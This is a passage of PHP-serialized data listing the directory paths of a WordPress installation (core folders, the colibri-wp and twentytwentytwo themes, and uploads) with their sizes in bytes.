:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/pattern\";i:269;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/gallery\";i:88353;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/quote\";i:10971;s:70:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/navigation-link\";i:16278;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/widget-group\";i:319;s:73:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/navigation-submenu\";i:8767;s:54:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks\";i:1209707;s:53:\"/home/websites/gsudice.dataconn.net/wp-includes/fonts\";i:289826;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/block-patterns\";i:9046;s:55:\"/home/websites/gsudice.dataconn.net/wp-includes/widgets\";i:156236;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/sitemaps/providers\";i:16350;s:56:\"/home/websites/gsudice.dataconn.net/wp-includes/sitemaps\";i:46283;s:54:\"/home/websites/gsudice.dataconn.net/wp-includes/assets\";i:11065;s:51:\"/home/websites/gsudice.dataconn.net/wp-includes/IXR\";i:33914;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/theme-compat\";i:15447;s:57:\"/home/websites/gsudice.dataconn.net/wp-includes/customize\";i:173484;s:51:\"/home/websites/gsudice.dataconn.net/wp-includes/ID3\";i:1143654;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/rest-api/endpoints\";i:704928;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/rest-api/fields\";i:22314;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/rest-api/search\";i:15180;s:56:\"/home/websites/gsudice.dataconn.net/wp-includes/rest-api\";i:827869;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Utility\";i:3310;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Exception/HTTP\";i:14365;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Exception/Transport\";i:919;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Exception\";i:16778;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Transport\";i:30090;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Cookie\";i:3865;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Auth\";i:1939;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Proxy\";i:3488;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Response\";i:2135;s:56:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests\";i:139225;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/images/crystal\";i:15541;s:58:\"/home/websites/gsudice.dataconn.net/wp-includes/images/wlw\";i:4413;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/images/media\";i:2419;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/images/smilies\";i:10082;s:54:\"/home/websites/gsudice.dataconn.net/wp-includes/images\";i:103747;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/HTTP\";i:11487;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Cache\";i:39607;s:70:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Content/Type\";i:8015;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Content\";i:8015;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Net\";i:7493;s:73:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/XML/Declaration\";i:7098;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/XML\";i:7098;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Parse\";i:20551;s:69:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Decode/HTML\";i:17241;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Decode\";i:17241;s:57:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie\";i:458625;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/Text/Diff/Engine\";i:31662;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/Text/Diff/Renderer\";i:5535;s:57:\"/home/websites/gsudice.dataconn.net/wp-includes/Text/Diff\";i:44010;s:52:\"/home/websites/gsudice.dataconn.net/wp-includes/Text\";i:56925;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/block-supports\";i:57444;s:86:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced/Core/Poly1305\";i:112;s:91:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge\";i:602;s:88:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced/Core/Curve25519\";i:820;s:86:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced/Core/ChaCha20\";i:224;s:77:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced/Core\";i:2444;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced\";i:2698;s:79:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/Poly1305\";i:12912;s:84:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/Curve25519/Ge\";i:7881;s:81:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/Curve25519\";i:121645;s:83:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/SecretStream\";i:3624;s:79:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/ChaCha20\";i:5264;s:77:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/Base64\";i:22135;s:70:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core\";i:450529;s:81:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32/Poly1305\";i:15980;s:86:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32/Curve25519/Ge\";i:8177;s:83:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32/Curve25519\";i:122511;s:85:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32/SecretStream\";i:3656;s:81:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32/ChaCha20\";i:6407;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32\";i:437807;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/PHP52\";i:4116;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src\";i:1203596;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/lib\";i:84845;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat\";i:1297228;s:52:\"/home/websites/gsudice.dataconn.net/wp-includes/pomo\";i:53584;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/js/codemirror\";i:1287141;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/js/jquery/ui\";i:806754;s:57:\"/home/websites/gsudice.dataconn.net/wp-includes/js/jquery\";i:1323191;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/js/plupload\";i:490206;s:56:\"/home/websites/gsudice.dataconn.net/wp-includes/js/jcrop\";i:18340;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/js/dist/vendor\";i:2371758;s:55:\"/home/websites/gsudice.dataconn.net/wp-includes/js/dist\";i:14745521;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/js/imgareaselect\";i:49035;s:80:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins/lightgray/fonts\";i:155760;s:78:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins/lightgray/img\";i:2856;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins/lightgray\";i:210254;s:81:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins/wordpress/images\";i:14207;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins/wordpress\";i:22831;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins\";i:233085;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/utils\";i:18822;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/themes/modern\";i:446221;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/themes/inlite\";i:452642;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/themes\";i:898863;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/image\";i:55874;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpdialogs\";i:3761;s:78:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/colorpicker\";i:4910;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/link\";i:32949;s:73:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wplink\";i:26476;s:81:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/directionality\";i:2749;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/lists\";i:97383;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/media\";i:57914;s:80:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wptextpattern\";i:11927;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wordpress\";i:50608;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/textcolor\";i:16237;s:75:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/tabfocus\";i:5336;s:79:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/compat3x/css\";i:8179;s:75:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/compat3x\";i:21758;s:73:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpview\";i:8994;s:77:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/fullscreen\";i:7779;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/charmap\";i:31811;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/paste\";i:113193;s:78:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpeditimage\";i:37716;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpemoji\";i:5099;s:69:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/hr\";i:1347;s:79:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpautoresize\";i:8332;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpgallery\";i:4808;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins\";i:606961;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/langs\";i:15529;s:58:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce\";i:2853651;s:55:\"/home/websites/gsudice.dataconn.net/wp-includes/js/crop\";i:20004;s:73:\"/home/websites/gsudice.dataconn.net/wp-includes/js/mediaelement/renderers\";i:18880;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/js/mediaelement\";i:719405;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/js/thickbox\";i:31185;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/js/swfupload\";i:8715;s:50:\"/home/websites/gsudice.dataconn.net/wp-includes/js\";i:23969950;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/certificates\";i:233231;s:58:\"/home/websites/gsudice.dataconn.net/wp-includes/php-compat\";i:1203;s:57:\"/home/websites/gsudice.dataconn.net/wp-includes/PHPMailer\";i:224753;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/widgets\";i:27172;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/edit-post\";i:209173;s:69:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/block-editor\";i:483181;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/components\";i:531384;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/format-library\";i:10926;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/nux\";i:14676;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/reusable-blocks\";i:5178;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/editor\";i:93521;s:70:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/block-library\";i:649649;s:77:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/list-reusable-blocks\";i:21928;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/customize-widgets\";i:30458;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/edit-site\";i:181435;s:69:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/edit-widgets\";i:103495;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/block-directory\";i:17844;s:56:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist\";i:2380020;s:51:\"/home/websites/gsudice.dataconn.net/wp-includes/css\";i:3025747;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/random_compat\";i:40843;s:47:\"/home/websites/gsudice.dataconn.net/wp-includes\";i:40074410;s:53:\"/home/websites/gsudice.dataconn.net/wp-admin/includes\";i:2888348;s:49:\"/home/websites/gsudice.dataconn.net/wp-admin/user\";i:3418;s:51:\"/home/websites/gsudice.dataconn.net/wp-admin/images\";i:444788;s:55:\"/home/websites/gsudice.dataconn.net/wp-admin/js/widgets\";i:139408;s:47:\"/home/websites/gsudice.dataconn.net/wp-admin/js\";i:1899502;s:61:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/light\";i:78320;s:62:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/modern\";i:77824;s:60:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/blue\";i:77743;s:62:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/coffee\";i:75220;s:64:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/midnight\";i:77712;s:61:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/ocean\";i:75241;s:65:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/ectoplasm\";i:77754;s:63:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/sunrise\";i:77771;s:55:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors\";i:640955;s:48:\"/home/websites/gsudice.dataconn.net/wp-admin/css\";i:2491200;s:50:\"/home/websites/gsudice.dataconn.net/wp-admin/maint\";i:7260;s:52:\"/home/websites/gsudice.dataconn.net/wp-admin/network\";i:124281;s:44:\"/home/websites/gsudice.dataconn.net/wp-admin\";i:8731141;s:35:\"/home/websites/gsudice.dataconn.net\";i:48978993;s:87:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/sidebar\";i:4108;s:102:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/layout-wrapper-content\";i:10107;s:87:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/content\";i:4921;s:84:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/main\";i:32019;s:92:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/front-footer\";i:1854;s:100:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/inner-header/top-bar\";i:4122;s:92:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/inner-header\";i:17524;s:84:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/blog\";i:2568;s:100:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/front-header/buttons\";i:1004;s:100:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/front-header/top-bar\";i:4115;s:92:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/front-header\";i:80577;s:79:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts\";i:153678;s:87:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/fonts/vendor\";i:17204;s:80:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/fonts\";i:17204;s:85:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/customizer\";i:3184810;s:96:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/header-presets/images\";i:2582145;s:98:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/header-presets/previews\";i:81173;s:89:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/header-presets\";i:2663318;s:95:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/images/header-shapes\";i:1630832;s:81:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/images\";i:3159902;s:80:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/theme\";i:598504;s:80:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/admin\";i:27208;s:74:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources\";i:9650946;s:84:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/vendor/composer\";i:19045;s:75:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/vendor\";i:19223;s:77:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Core\";i:20615;s:95:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components/FrontHeader\";i:49581;s:90:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components/Footer\";i:3524;s:90:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components/Header\";i:75137;s:95:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components/InnerHeader\";i:2698;s:95:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components/MainContent\";i:2945;s:83:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components\";i:172046;s:90:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/BuilderComponents\";i:14946;s:89:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Customizer/Panel\";i:1565;s:92:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Customizer/Sections\";i:3857;s:92:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Customizer/Controls\";i:35039;s:83:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Customizer\";i:54214;s:72:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src\";i:329881;s:68:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc\";i:688923;s:70:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/admin\";i:18359;s:79:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/page-templates\";i:1008;s:64:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp\";i:11078376;s:82:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/assets/fonts\";i:1409152;s:83:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/assets/videos\";i:468755;s:83:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/assets/images\";i:1874112;s:76:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/assets\";i:3752019;s:75:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/parts\";i:2791;s:82:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/inc/patterns\";i:157065;s:73:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/inc\";i:161008;s:79:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/templates\";i:13966;s:69:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo\";i:4114161;s:53:\"/home/websites/gsudice.dataconn.net/wp-content/themes\";i:15192565;s:54:\"/home/websites/gsudice.dataconn.net/wp-content/plugins\";i:28;s:62:\"/home/websites/gsudice.dataconn.net/wp-content/uploads/2022/02\";i:1071492;s:59:\"/home/websites/gsudice.dataconn.net/wp-content/uploads/2022\";i:1071492;s:54:\"/home/websites/gsudice.dataconn.net/wp-content/uploads\";i:1071492;s:32:\"/var/www/html/wp-content/upgrade\";i:0;s:24:\"/var/www/html/wp-content\";i:28;s:40:\"/var/www/html/wp-includes/block-supports\";i:58180;s:29:\"/var/www/html/wp-includes/ID3\";i:1143654;s:38:\"/var/www/html/wp-includes/images/media\";i:2419;s:40:\"/var/www/html/wp-includes/images/smilies\";i:10082;s:40:\"/var/www/html/wp-includes/images/crystal\";i:15541;s:36:\"/var/www/html/wp-includes/images/wlw\";i:4413;s:32:\"/var/www/html/wp-includes/images\";i:103747;s:42:\"/var/www/html/wp-includes/js/imgareaselect\";i:49035;s:34:\"/var/www/html/wp-includes/js/jcrop\";i:18340;s:51:\"/var/www/html/wp-includes/js/mediaelement/renderers\";i:18880;s:41:\"/var/www/html/wp-includes/js/mediaelement\";i:719405;s:33:\"/var/www/html/wp-includes/js/crop\";i:20004;s:37:\"/var/www/html/wp-includes/js/plupload\";i:490206;s:37:\"/var/www/html/wp-includes/js/thickbox\";i:31185;s:38:\"/var/www/html/wp-includes/js/jquery/ui\";i:807176;s:35:\"/var/www/html/wp-includes/js/jquery\";i:1323522;s:38:\"/var/www/html/wp-includes/js/swfupload\";i:8715;s:56:\"/var/www/html/wp-includes/js/tinymce/skins/lightgray/img\";i:2856;s:58:\"/var/www/html/wp-includes/js/tinymce/skins/lightgray/fonts\";i:155760;s:52:\"/var/www/html/wp-includes/js/tinymce/skins/lightgray\";i:210254;s:59:\"/var/www/html/wp-includes/js/tinymce/skins/wordpress/images\";i:14207;s:52:\"/var/www/html/wp-includes/js/tinymce/skins/wordpress\";i:22831;s:42:\"/var/www/html/wp-includes/js/tinymce/skins\";i:233085;s:42:\"/var/www/html/wp-includes/js/tinymce/utils\";i:18822;s:52:\"/var/www/html/wp-includes/js/tinymce/plugins/wpemoji\";i:5099;s:50:\"/var/www/html/wp-includes/js/tinymce/plugins/image\";i:55874;s:54:\"/var/www/html/wp-includes/js/tinymce/plugins/wpgallery\";i:4808;s:50:\"/var/www/html/wp-includes/js/tinymce/plugins/paste\";i:113193;s:56:\"/var/www/html/wp-includes/js/tinymce/plugins/colorpicker\";i:4910;s:47:\"/var/www/html/wp-includes/js/tinymce/plugins/hr\";i:1347;s:58:\"/var/www/html/wp-includes/js/tinymce/plugins/wptextpattern\";i:11927;s:54:\"/var/www/html/wp-includes/js/tinymce/plugins/wpdialogs\";i:3761;s:55:\"/var/www/html/wp-includes/js/tinymce/plugins/fullscreen\";i:7779;s:57:\"/var/www/html/wp-includes/js/tinymce/plugins/wpautoresize\";i:8332;s:50:\"/var/www/html/wp-includes/js/tinymce/plugins/media\";i:57914;s:57:\"/var/www/html/wp-includes/js/tinymce/plugins/compat3x/css\";i:8179;s:53:\"/var/www/html/wp-includes/js/tinymce/plugins/compat3x\";i:21758;s:54:\"/var/www/html/wp-includes/js/tinymce/plugins/textcolor\";i:16237;s:52:\"/var/www/html/wp-includes/js/tinymce/plugins/charmap\";i:31811;s:53:\"/var/www/html/wp-includes/js/tinymce/plugins/tabfocus\";i:5336;s:59:\"/var/www/html/wp-includes/js/tinymce/plugins/directionality\";i:2749;s:50:\"/var/www/html/wp-includes/js/tinymce/plugins/lists\";i:97383;s:51:\"/var/www/html/wp-includes/js/tinymce/plugins/wplink\";i:26476;s:54:\"/var/www/html/wp-includes/js/tinymce/plugins/wordpress\";i:50608;s:51:\"/var/www/html/wp-includes/js/tinymce/plugins/wpview\";i:8994;s:56:\"/var/www/html/wp-includes/js/tinymce/plugins/wpeditimage\";i:37716;s:49:\"/var/www/html/wp-includes/js/tinymce/plugins/link\";i:32949;s:44:\"/var/www/html/wp-includes/js/tinymce/plugins\";i:606961;s:42:\"/var/www/html/wp-includes/js/tinymce/langs\";i:15529;s:50:\"/var/www/html/wp-includes/js/tinymce/themes/modern\";i:446221;s:50:\"/var/www/html/wp-includes/js/tinymce/themes/inlite\";i:452642;s:43:\"/var/www/html/wp-includes/js/tinymce/themes\";i:898863;s:36:\"/var/www/html/wp-includes/js/tinymce\";i:2853651;s:39:\"/var/www/html/wp-includes/js/codemirror\";i:1287141;s:40:\"/var/www/html/wp-includes/js/dist/vendor\";i:2371758;s:33:\"/var/www/html/wp-includes/js/dist\";i:14796235;s:28:\"/var/www/html/wp-includes/js\";i:24021139;s:40:\"/var/www/html/wp-includes/block-patterns\";i:9046;s:42:\"/var/www/html/wp-includes/Text/Diff/Engine\";i:31662;s:44:\"/var/www/html/wp-includes/Text/Diff/Renderer\";i:5535;s:35:\"/var/www/html/wp-includes/Text/Diff\";i:44010;s:30:\"/var/www/html/wp-includes/Text\";i:56925;s:36:\"/var/www/html/wp-includes/php-compat\";i:1203;s:35:\"/var/www/html/wp-includes/customize\";i:173484;s:32:\"/var/www/html/wp-includes/assets\";i:11065;s:51:\"/var/www/html/wp-includes/SimplePie/XML/Declaration\";i:7098;s:39:\"/var/www/html/wp-includes/SimplePie/XML\";i:7098;s:41:\"/var/www/html/wp-includes/SimplePie/Parse\";i:20551;s:47:\"/var/www/html/wp-includes/SimplePie/Decode/HTML\";i:17241;s:42:\"/var/www/html/wp-includes/SimplePie/Decode\";i:17241;s:40:\"/var/www/html/wp-includes/SimplePie/HTTP\";i:11487;s:41:\"/var/www/html/wp-includes/SimplePie/Cache\";i:39607;s:48:\"/var/www/html/wp-includes/SimplePie/Content/Type\";i:8015;s:43:\"/var/www/html/wp-includes/SimplePie/Content\";i:8015;s:39:\"/var/www/html/wp-includes/SimplePie/Net\";i:7493;s:35:\"/var/www/html/wp-includes/SimplePie\";i:458625;s:41:\"/var/www/html/wp-includes/rest-api/search\";i:15180;s:44:\"/var/www/html/wp-includes/rest-api/endpoints\";i:705001;s:41:\"/var/www/html/wp-includes/rest-api/fields\";i:22314;s:34:\"/var/www/html/wp-includes/rest-api\";i:827942;s:44:\"/var/www/html/wp-includes/blocks/post-author\";i:5500;s:42:\"/var/www/html/wp-includes/blocks/shortcode\";i:8116;s:39:\"/var/www/html/wp-includes/blocks/search\";i:16747;s:45:\"/var/www/html/wp-includes/blocks/post-excerpt\";i:7385;s:38:\"/var/www/html/wp-includes/blocks/image\";i:30212;s:43:\"/var/www/html/wp-includes/blocks/post-terms\";i:3929;s:43:\"/var/www/html/wp-includes/blocks/site-title\";i:4469;s:46:\"/var/www/html/wp-includes/blocks/post-comments\";i:11301;s:45:\"/var/www/html/wp-includes/blocks/latest-posts\";i:16736;s:42:\"/var/www/html/wp-includes/blocks/post-date\";i:792;s:40:\"/var/www/html/wp-includes/blocks/heading\";i:4991;s:41:\"/var/www/html/wp-includes/blocks/loginout\";i:455;s:41:\"/var/www/html/wp-includes/blocks/archives\";i:6698;s:37:\"/var/www/html/wp-includes/blocks/code\";i:7774;s:38:\"/var/www/html/wp-includes/blocks/quote\";i:10971;s:49:\"/var/www/html/wp-includes/blocks/term-description\";i:588;s:42:\"/var/www/html/wp-includes/blocks/separator\";i:13254;s:38:\"/var/www/html/wp-includes/blocks/audio\";i:11211;s:39:\"/var/www/html/wp-includes/blocks/column\";i:687;s:43:\"/var/www/html/wp-includes/blocks/media-text\";i:19797;s:40:\"/var/www/html/wp-includes/blocks/buttons\";i:15767;s:53:\"/var/www/html/wp-includes/blocks/post-navigation-link\";i:865;s:44:\"/var/www/html/wp-includes/blocks/query-title\";i:887;s:45:\"/var/www/html/wp-includes/blocks/widget-group\";i:319;s:38:\"/var/www/html/wp-includes/blocks/table\";i:30378;s:43:\"/var/www/html/wp-includes/blocks/categories\";i:7307;s:37:\"/var/www/html/wp-includes/blocks/html\";i:6648;s:52:\"/var/www/html/wp-includes/blocks/post-featured-image\";i:23629;s:46:\"/var/www/html/wp-includes/blocks/post-template\";i:12819;s:40:\"/var/www/html/wp-includes/blocks/pattern\";i:269;s:45:\"/var/www/html/wp-includes/blocks/site-tagline\";i:4180;s:37:\"/var/www/html/wp-includes/blocks/file\";i:20282;s:41:\"/var/www/html/wp-includes/blocks/calendar\";i:5089;s:45:\"/var/www/html/wp-includes/blocks/post-content\";i:384;s:54:\"/var/www/html/wp-includes/blocks/query-pagination-next\";i:740;s:45:\"/var/www/html/wp-includes/blocks/preformatted\";i:4198;s:58:\"/var/www/html/wp-includes/blocks/query-pagination-previous\";i:752;s:45:\"/var/www/html/wp-includes/blocks/social-links\";i:55550;s:41:\"/var/www/html/wp-includes/blocks/freeform\";i:42190;s:38:\"/var/www/html/wp-includes/blocks/group\";i:11365;s:37:\"/var/www/html/wp-includes/blocks/more\";i:6691;s:38:\"/var/www/html/wp-includes/blocks/video\";i:22014;s:38:\"/var/www/html/wp-includes/blocks/verse\";i:4285;s:42:\"/var/www/html/wp-includes/blocks/site-logo\";i:20232;s:45:\"/var/www/h